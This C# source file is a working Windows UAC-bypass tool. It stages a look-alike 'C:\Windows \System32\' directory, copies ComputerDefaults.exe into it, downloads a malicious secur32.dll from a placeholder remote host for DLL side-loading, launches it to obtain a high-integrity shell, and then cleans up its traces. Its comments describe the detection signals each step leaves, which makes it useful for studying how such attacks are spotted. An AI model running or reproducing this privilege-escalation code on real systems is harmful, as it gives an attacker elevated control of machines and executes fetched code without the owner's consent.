- using System;
- using System.IO;
- using System.Runtime.InteropServices;
- using System.Diagnostics;
- using System.Net;
- namespace HighBorn
- {
- /// <summary>
- /// Console program that stages a UAC bypass through a "mock trusted directory":
- /// it creates <c>C:\Windows \System32\</c> (note the trailing space after "Windows"),
- /// copies ComputerDefaults.exe into it, places a remotely fetched secur32.dll
- /// beside it, launches that copy, and then deletes everything it created.
- /// Every step leaves an observable artifact a defender can alert on (see the
- /// comments in <see cref="Main"/>): a directory name with a trailing space created
- /// under the system drive via an extended-length (\\?\) path, a copy of a Windows
- /// binary executed from a non-standard path, an HTTP download written to
- /// C:\Windows\temp, and WOW64 file-system redirection being disabled for the thread.
- /// </summary>
- class HighBorn
- {
- // --- kernel32 P/Invokes. All of these report failure through their bool return
- // value plus GetLastError (SetLastError = true); they do not throw, so the
- // try/catch blocks in Main never observe a failed API call.
- [DllImport("kernel32.dll", SetLastError = true)]
- static extern bool Wow64DisableWow64FsRedirection(ref IntPtr ptr);
- [DllImport("kernel32.dll", SetLastError = true)]
- static extern bool Wow64RevertWow64FsRedirection(IntPtr ptr);
- // Called with "\\?\" extended-length paths below; that prefix is presumably what
- // lets a directory name ending in a space through, since ordinary Win32 path
- // normalization would strip it.
- [DllImport("kernel32.dll", SetLastError = true)]
- static extern bool CreateDirectory(string lpPathName, IntPtr lpSecurityAttributes);
- // bFailIfExists is passed as true at every call site, so an existing destination
- // makes the copy a silent no-op (return value is never checked).
- [DllImport("kernel32.dll", CharSet = CharSet.Unicode, SetLastError = true)]
- static extern bool CopyFile(string lpExistingFileName, string lpNewFileName, bool bFailIfExists);
- [DllImport("kernel32.dll", SetLastError = true)]
- [return: MarshalAs(UnmanagedType.Bool)]
- static extern bool DeleteFileW([MarshalAs(UnmanagedType.LPWStr)]string lpFileName);
- [DllImport("kernel32.dll", SetLastError = true)]
- static extern bool RemoveDirectory(string lpPathName);
- // --- ntdll P/Invokes used by SleepShort instead of Thread.Sleep. Direct use of
- // NtDelayExecution/ZwSetTimerResolution from a managed binary is itself unusual
- // and is worth noting when triaging the import table.
- [DllImport("ntdll.dll")]
- public static extern int NtDelayExecution(bool Alertable, ref long DelayInterval);
- [DllImport("ntdll.dll")]
- public static extern int ZwSetTimerResolution(uint RequestedResolution, bool Set, out uint ActualResolution);
- // Set once by SleepShort; not synchronized, which is acceptable here because
- // only Main (single-threaded) calls SleepShort.
- private static bool isResolutionSet = false;
- /// <summary>
- /// Blocks the calling thread for roughly <paramref name="milliseconds"/> via
- /// NtDelayExecution. On first use it requests the finest timer resolution
- /// (RequestedResolution = 1, presumably in 100 ns units) and discards the
- /// ActualResolution the kernel reports back.
- /// </summary>
- /// <param name="milliseconds">Delay length in milliseconds.</param>
- static void SleepShort(float milliseconds)
- {
- if (!isResolutionSet)
- {
- uint actualResolution;
- ZwSetTimerResolution(1, true, out actualResolution);
- isResolutionSet = true;
- }
- // Negative value = relative delay, expressed in 100 ns ticks (1 ms = 10000 ticks).
- long interval = (long)(-1 * milliseconds * 10000.0f); // Convert to 100-nanosecond intervals
- NtDelayExecution(false, ref interval);
- }
- /// <summary>
- /// Entry point. Runs the staging, execution and cleanup sequence described on the
- /// class, pausing two seconds between steps. Console output is purely informational
- /// and does not reflect whether the underlying API calls succeeded.
- /// </summary>
- /// <param name="args">Unused.</param>
- public static void Main(string[] args)
- {
- // Disable WOW64 file-system redirection for this thread so the System32 paths
- // used below are not redirected on 64-bit Windows; the old state is kept in
- // wow64Value and restored at the end of Main.
- IntPtr wow64Value = IntPtr.Zero;
- Wow64DisableWow64FsRedirection(ref wow64Value);
- // Printed before the directories are created; the message is not tied to the result.
- Console.WriteLine("[^] Directories Created");
- try
- {
- // Detection hook: a directory created directly under C:\ whose name ends in a
- // space, via an extended-length path. Legitimate software has little reason to do this.
- CreateDirectory(@"\\?\C:\Windows \", IntPtr.Zero);
- CreateDirectory(@"\\?\C:\Windows \System32\", IntPtr.Zero);
- }
- catch
- {
- // Unreachable for a plain API failure (see note on the P/Invokes above).
- Console.WriteLine("[-] Unable to create directories");
- }
- SleepShort(2000); // Sleep for 2 seconds
- Console.WriteLine("[^] Copying Executable Into Mock Directory");
- try
- {
- // Detection hook: a Windows system binary being copied out of System32 into a
- // look-alike path. Return value is ignored.
- CopyFile(@"C:\Windows\System32\ComputerDefaults.exe", @"C:\Windows \System32\ComputerDefaults.exe", true);
- }
- catch
- {
- Console.WriteLine("[-] Unable to create the mock directories");
- }
- SleepShort(2000); // Sleep for 2 seconds
- Console.WriteLine("[^] Downloading Malicious DLL");
- try
- {
- // Plain-HTTP fetch from a remote host ("IP:PORT" is an unfilled placeholder) into
- // C:\Windows\temp; both the outbound request and the file write are loggable.
- using (WebClient webClient = new WebClient())
- {
- webClient.DownloadFile("http://IP:PORT/secur32.dll", @"C:\Windows\temp\secur32.dll");
- }
- }
- catch
- {
- // NOTE(review): this branch runs only when DownloadFile threw, yet it prints a
- // success-looking message; the text is misleading.
- Console.WriteLine("[^] DLL Downloaded");
- }
- // Places the downloaded DLL next to the copied executable. Return value is
- // ignored, so a failed download above is not noticed here either.
- CopyFile(@"C:\Windows\temp\secur32.dll", @"C:\Windows \System32\secur32.dll", true);
- SleepShort(2000); // Sleep for 2 seconds
- Console.WriteLine("[^] Spawning High Integrity Shell");
- try
- {
- // Launches the copy from the mock directory and blocks until it exits. A process
- // whose image path is under "C:\Windows \System32\" is the strongest single
- // signal this program produces for process-creation telemetry.
- Process.Start(@"C:\Windows \System32\ComputerDefaults.exe").WaitForExit();
- }
- catch
- {
- Console.WriteLine("[-] Shell messed up");
- }
- SleepShort(2000); // Sleep for 2 seconds
- Console.WriteLine("[^] Cleaning Up");
- // Removes the staged files and directories in reverse order of creation; note
- // that RemoveDirectory is called here without the "\\?\" prefix used at creation.
- // Cleanup failures are not reported (return values ignored).
- DeleteFileW(@"C:\Windows\temp\secur32.dll");
- SleepShort(2000);
- DeleteFileW(@"C:\Windows \System32\ComputerDefaults.exe");
- SleepShort(2000);
- DeleteFileW(@"C:\Windows \System32\secur32.dll");
- RemoveDirectory(@"C:\Windows \System32\");
- RemoveDirectory(@"C:\Windows \");
- // Restore the redirection state saved at the top of Main.
- Wow64RevertWow64FsRedirection(wow64Value);
- }
- }
- }